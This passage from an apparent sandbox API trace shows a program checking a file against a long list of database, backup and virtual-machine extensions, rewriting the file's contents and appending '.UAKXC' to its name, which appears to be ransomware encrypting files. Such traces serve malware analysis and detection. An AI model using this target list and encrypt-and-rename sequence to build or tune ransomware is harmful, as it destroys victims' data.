lpSrch=".dp1") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dqy") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dsk") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dsn") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dtsx") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dxl") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".eco") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ecx") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".edb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".epim") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".exb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fcd") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fdb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fic") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fmp") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fmp12") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fmpsl") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fol") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fp3") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fp4") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fp5") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fp7") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fpt") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".frm") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".gdb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".grdb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".gwi") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".hdb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".his") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ib") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".idb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ihx") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".itdb") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".itw") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".jet") returned 0x0 [0159.547] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".jtx") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".kdb") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".kexi") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".kexic") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".kexis") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".lgc") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".lwx") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".maf") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".maq") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mar") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mas") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mav") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mdb") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mdf") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mpd") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mrg") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mud") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mwb") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".myd") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ndf") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nnt") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nrmlib") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ns2") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ns3") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ns4") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nsf") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nv") returned 0x0 [0159.548] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nv2") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nwdb") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nyf") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".odb") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".oqy") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".orx") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".owc") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".p96") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".p97") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".pan") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".pdb") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".pdm") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".pnz") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".qry") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".qvd") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".rbf") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".rctd") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".rod") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".rodx") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".rpd") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".rsd") returned 0x0 [0159.549] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sbf") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".scx") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sdb") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sdc") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sdf") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sis") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".spq") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sql") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sqlite") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sqlite3") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".te") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".temx") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".tmd") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".tps") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".trc") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".trm") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".udb") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".udl") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".usr") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".v12") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vis") returned 0x0 [0159.550] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vpd") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vvv") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".wdb") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".wmdb") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".wrk") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".xdb") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".xld") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".xmlff") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".abcddb") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".abs") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".abx") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".accdw") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".adn") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".db2") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".fm5") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".hjt") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".icg") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".icr") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".kdb") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".lut") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".maw") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mdn") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".mdt") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vdi") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vhd") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vmdk") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".pvm") returned 0x0 [0159.551] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vmem") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vmsn") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vmsd") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".nvram") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vmx") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".raw") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".qcow2") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".subvol") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".bin") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vsv") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".avhd") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vmrs") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vhdx") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".avdx") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".vmcx") returned 0x0 [0159.552] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".iso") returned 0x0 [0159.552] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.552] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0159.554] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0159.554] SetEndOfFile (hFile=0x714) returned 1 [0159.554] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.554] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x4cf, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x4cf, lpOverlapped=0x0) returned 1 [0159.554] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xfffffb31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.555] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x4cf, lpOverlapped=0x0) returned 1 [0159.555] CloseHandle (hObject=0x714) returned 1 [0159.556] GetProcessHeap () returned 0xea0000 [0159.556] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77950d0 [0159.556] lstrcpyW (in: lpString1=0x77950d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" [0159.556] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.UAKXC") returned="C:\\MSOCache\\All 